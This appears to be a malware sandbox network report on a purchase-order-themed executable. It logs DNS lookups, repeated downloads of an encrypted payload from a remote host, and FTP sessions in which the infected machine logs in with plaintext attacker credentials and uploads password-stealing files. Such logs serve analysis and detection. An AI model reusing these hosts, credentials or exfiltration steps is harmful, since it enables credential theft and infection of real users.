                                                        Oct 7, 2024 09:13:52.056828022 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.057229996 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.099953890 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.111381054 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.155414104 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.234330893 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.234376907 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.234386921 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.234436989 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.234447956 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.258404016 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.258512974 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.258527040 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.302910089 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.327119112 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.327131987 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.327182055 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.327198029 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.327306032 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.328294992 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.328305006 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.328363895 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.329235077 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.329242945 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.329296112 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.347208977 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.347223997 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.347412109 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.415586948 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.415601015 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.415718079 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.416383982 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.416393042 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.416481972 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.416508913 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.416523933 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.416542053 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.416637897 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.417423010 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.417562962 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.418355942 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.418631077 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.419212103 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.419289112 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.420136929 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.420270920 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.435810089 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.435921907 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.504795074 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.504883051 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.504959106 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.505059004 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.505074024 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.505171061 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.505176067 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.505203962 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.505253077 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.505253077 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.505925894 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.506023884 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.506083012 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.506083012 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.506098986 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.506149054 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.506732941 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.506823063 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.506854057 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.506926060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.507709026 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.507802963 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.507858992 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.507858992 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.507868052 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.507930040 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.508605957 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.508701086 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.508805037 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.508945942 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.524420023 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.524501085 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.524527073 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.524708033 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.592967987 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.593049049 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.593149900 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.593224049 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.593266964 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.593338966 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.593698978 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.593781948 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.593961000 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.594039917 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.594250917 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.594316959 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.594433069 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.594508886 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.594588995 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.594683886 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.594712973 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.594810963 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.595230103 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.595340014 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.595418930 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.595498085 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.595560074 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.595626116 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.596086025 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.596158028 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.596333981 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.596456051 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.612828970 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.612976074 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.613044024 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.613079071 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.613106966 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.613167048 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681447983 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681531906 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681653976 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681653976 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681674957 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681719065 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681786060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681786060 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681796074 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681921959 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.681978941 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681978941 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.681986094 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682029963 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682107925 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682118893 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682231903 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682301044 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682301044 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682307005 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682425976 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682488918 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682488918 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682497978 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682714939 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682777882 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682777882 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682785034 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682864904 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.682926893 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682926893 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.682934999 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.683420897 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.686440945 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.686537027 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.686595917 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.686595917 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.686604977 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.686794996 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.686856985 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.686856985 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.686863899 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.686985016 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.687047005 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.687047005 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.687052965 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.687091112 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.687150002 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.687150002 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.687155962 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.687424898 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.701566935 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.701672077 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.701709032 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.701715946 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.701734066 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.701937914 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.770215034 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.770323038 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.770384073 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.770503998 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.770523071 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.770627022 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.770642996 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.770776033 CEST4434974267.212.175.162192.168.2.4
                                                        Oct 7, 2024 09:13:52.770818949 CEST49742443192.168.2.467.212.175.162
                                                        Oct 7, 2024 09:13:52.770833969 CEST4434974267.212.175.162192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 09:13:30.930176973 CEST | 50602 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 09:13:31.134706020 CEST | 53 | 50602 | 1.1.1.1 | 192.168.2.4
Oct 7, 2024 09:13:35.070702076 CEST | 62558 | 53 | 192.168.2.4 | 1.1.1.1
Oct 7, 2024 09:13:35.235651016 CEST | 53 | 62558 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 09:13:30.930176973 CEST | 192.168.2.4 | 1.1.1.1 | 0x7e6f | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
Oct 7, 2024 09:13:35.070702076 CEST | 192.168.2.4 | 1.1.1.1 | 0x4906 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 09:13:31.134706020 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e6f | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 09:13:35.235651016 CEST | 1.1.1.1 | 192.168.2.4 | 0x4906 | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
                                                        • wymascensores.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 67.212.175.162 | 443 | 7096 | C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 07:13:32 UTC | 83 | OUT | GET /index/Nbyrwv.dat HTTP/1.1
Host: wymascensores.com
Connection: Keep-Alive
2024-10-07 07:13:32 UTC | 183 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 07:13:32 GMT
Server: Apache
Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
Accept-Ranges: bytes
Content-Length: 956424
Connection: close
                                                        Data Ascii: fhUMF0{yj'x%<A7KKuy`5NK/IyE8?38E^c[]p.Bm]vNfB}"[^h@$[K8(G&6SvB7VtQ<DE(~E`(?-HH7<BR2)]6=S+\,tm++vk+d#
                                                        2024-10-07 07:13:32 UTC8000INData Raw: d9 ef 29 17 70 2f de ea a8 62 55 91 05 a1 02 01 b8 06 cb e5 74 8d fb 98 28 15 69 96 4e 71 99 5c 8f 46 16 67 98 0a 8f 58 7d 94 e9 96 28 a2 11 17 58 bd 19 42 81 f4 51 82 00 8a f8 39 2e 9f 72 6d ff 3f 7a 0f 5c 79 2c 88 21 7d bf 38 61 43 81 19 a7 c8 d4 05 7a 93 b1 04 1b c4 16 04 2c bc 3c 35 a2 5f 90 4c 2e a2 75 4c ad 19 26 29 3c 0a 8f 4b e2 8f 9b e8 b4 92 d3 28 7b e7 c8 67 c2 f3 4f 3e 18 ee d8 fe 2f 4e 68 d3 e5 ec 50 02 d5 af 86 59 39 e5 f8 ad b9 20 48 37 bb 09 3c bb 89 e5 c0 de ac fc 38 76 f1 ae db 15 36 8a 88 db a2 f4 35 b6 57 a8 2e 5a 6d 7c b5 b5 ac 3d 51 26 ee 55 ab c7 ff 04 e3 0b 9e 53 f1 6c 96 78 ce 26 47 0c dc 6c 00 8f 1b c9 a1 61 14 41 88 16 46 f4 7b 31 1f 05 8a 88 0c a8 ff ac c0 2b 3f e5 f4 ae e2 47 3b d6 6c df a6 5e 1d f0 0e 28 be e3 cf 40 e5 78 0c
                                                        Data Ascii: )p/bUt(iNq\FgX}(XBQ9.rm?z\y,!}8aCz,<5_L.uL&)<K({gO>/NhPY9 H7<8v65W.Zm|=Q&USlx&GlaAF{1+?G;l^(@x
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 8f 2f 95 46 49 be 29 26 1a 22 80 12 05 0d 98 c3 9c e9 06 93 c6 6b 97 05 5f 3e e6 2f e2 a4 aa e1 62 d4 0f 19 e4 ae 70 9a d4 46 64 75 ef 59 07 61 28 f4 76 0c 73 68 f2 a6 ef 98 0b b1 23 87 f3 5f a7 bd 00 71 8b e3 42 9f 0d 0c 3b b8 5c d0 9c b0 cb 5d d3 9f 84 ac 99 eb f6 50 08 5c ad 34 19 9d ec a9 75 ee c3 f8 d9 eb 7e c7 da ba bd 26 29 54 d7 5a 8f 96 0d b5 ec 0a ad 0a 5f 4d 24 f9 fa 08 84 b2 41 25 03 c3 76 00 a9 41 ed c6 47 bc 8c 8a 96 91 34 34 84 72 05 8d 5f d4 c9 16 08 50 2a 88 21 83 e9 e4 64 bf 06 13 30 09 14 d9 d0 fd 92 70 86 96 b9 44 6c 8a 66 f9 14 bb 25 ba bc 99 85 76 e0 49 b4 37 16 88 a8 1d a5 f1 dc c9 6f aa 5f 7f 11 9d d8 2d 58 12 f8 34 b2 f7 6f eb 0d 51 a7 85 56 26 a9 75 22 61 10 a2 3a ce 61 82 32 21 7c 1d c8 4e 9d 1f 0d 20 6f b4 20 06 77 fd be 2a d9
                                                        Data Ascii: /FI)&"k_>/bpFduYa(vsh#_qB;\]P\4u~&)TZ_M$A%vAG44r_P*!d0pDlf%vI7o_-X4oQV&u"a:a2!|N o w*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 67.212.175.162 | 443 | 2472 | C:\Users\user\AppData\Roaming\Avycqjqvmh.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 07:13:43 UTC | 83 | OUT | GET /index/Nbyrwv.dat HTTP/1.1
    Host: wymascensores.com
    Connection: Keep-Alive
2024-10-07 07:13:43 UTC | 183 | IN | HTTP/1.1 200 OK
    Date: Mon, 07 Oct 2024 07:13:43 GMT
    Server: Apache
    Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
    Accept-Ranges: bytes
    Content-Length: 956424
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 67.212.175.162 | 443 | 928 | C:\Users\user\AppData\Roaming\Avycqjqvmh.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 07:13:52 UTC | 83 | OUT | GET /index/Nbyrwv.dat HTTP/1.1
    Host: wymascensores.com
    Connection: Keep-Alive
2024-10-07 07:13:52 UTC | 183 | IN | HTTP/1.1 200 OK
    Date: Mon, 07 Oct 2024 07:13:52 GMT
    Server: Apache
    Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
    Accept-Ranges: bytes
    Content-Length: 956424
    Connection: close


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 7, 2024 09:13:36.050350904 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 2 of 100 allowed.
    220-Local time is now 10:13. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Oct 7, 2024 09:13:36.050604105 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Oct 7, 2024 09:13:36.309659004 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 7, 2024 09:13:36.309820890 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | PASS Fineboy777@
Oct 7, 2024 09:13:36.663338900 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 230 OK. Current restricted directory is /
Oct 7, 2024 09:13:36.922656059 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 504 Unknown command
Oct 7, 2024 09:13:36.922807932 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | PWD
Oct 7, 2024 09:13:37.181900978 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 257 "/" is your current location
Oct 7, 2024 09:13:37.182140112 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | TYPE I
Oct 7, 2024 09:13:37.441587925 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Oct 7, 2024 09:13:37.441781998 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | PASV
Oct 7, 2024 09:13:37.740680933 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 227 Entering Passive Mode (5,2,84,236,240,129)
Oct 7, 2024 09:13:37.746922016 CEST | 49731 | 21 | 192.168.2.4 | 5.2.84.236 | STOR PW_user-377142_2024_10_07_03_13_34.html
Oct 7, 2024 09:13:38.457134962 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 150 Accepted data connection
Oct 7, 2024 09:13:38.716300011 CEST | 21 | 49731 | 5.2.84.236 | 192.168.2.4 | 226-File successfully transferred
    226 0.259 seconds (measured here), 1.20 Kbytes per second
Oct 7, 2024 09:13:47.841573000 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 3 of 100 allowed.
    220-Local time is now 10:13. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Oct 7, 2024 09:13:47.841837883 CEST | 49735 | 21 | 192.168.2.4 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Oct 7, 2024 09:13:48.387826920 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 7, 2024 09:13:48.388324022 CEST | 49735 | 21 | 192.168.2.4 | 5.2.84.236 | PASS Fineboy777@
Oct 7, 2024 09:13:48.388577938 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 7, 2024 09:13:48.598280907 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 331 User fgghv@alternatifplastik.com OK. Password required
Oct 7, 2024 09:13:48.880084038 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 230 OK. Current restricted directory is /
Oct 7, 2024 09:13:49.144174099 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 504 Unknown command
Oct 7, 2024 09:13:49.144337893 CEST | 49735 | 21 | 192.168.2.4 | 5.2.84.236 | PWD
Oct 7, 2024 09:13:49.408490896 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 257 "/" is your current location
Oct 7, 2024 09:13:49.408658981 CEST | 49735 | 21 | 192.168.2.4 | 5.2.84.236 | TYPE I
Oct 7, 2024 09:13:49.672302961 CEST | 21 | 49735 | 5.2.84.236 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                        Oct 7, 2024 09:13:49.672904015 CEST4973521192.168.2.45.2.84.236PASV
                                                        Oct 7, 2024 09:13:49.936832905 CEST21497355.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,195,83)
                                                        Oct 7, 2024 09:13:49.942456961 CEST4973521192.168.2.45.2.84.236STOR PW_user-377142_2024_10_07_03_13_46.html
                                                        Oct 7, 2024 09:13:50.650012016 CEST21497355.2.84.236192.168.2.4150 Accepted data connection
                                                        Oct 7, 2024 09:13:50.931509972 CEST21497355.2.84.236192.168.2.4226-File successfully transferred
                                                        226-File successfully transferred226 0.267 seconds (measured here), 1.17 Kbytes per second
                                                        Oct 7, 2024 09:13:55.899801016 CEST21497435.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                        Oct 7, 2024 09:13:55.900016069 CEST4974321192.168.2.45.2.84.236USER fgghv@alternatifplastik.com
                                                        Oct 7, 2024 09:13:56.160398006 CEST21497435.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                                        Oct 7, 2024 09:13:56.161016941 CEST4974321192.168.2.45.2.84.236PASS Fineboy777@
                                                        Oct 7, 2024 09:13:56.451302052 CEST21497435.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                                        Oct 7, 2024 09:13:56.747598886 CEST21497435.2.84.236192.168.2.4504 Unknown command
                                                        Oct 7, 2024 09:13:56.747751951 CEST4974321192.168.2.45.2.84.236PWD
                                                        Oct 7, 2024 09:13:57.007870913 CEST21497435.2.84.236192.168.2.4257 "/" is your current location
                                                        Oct 7, 2024 09:13:57.008033037 CEST4974321192.168.2.45.2.84.236TYPE I
                                                        Oct 7, 2024 09:13:57.268066883 CEST21497435.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                                        Oct 7, 2024 09:13:57.268212080 CEST4974321192.168.2.45.2.84.236PASV
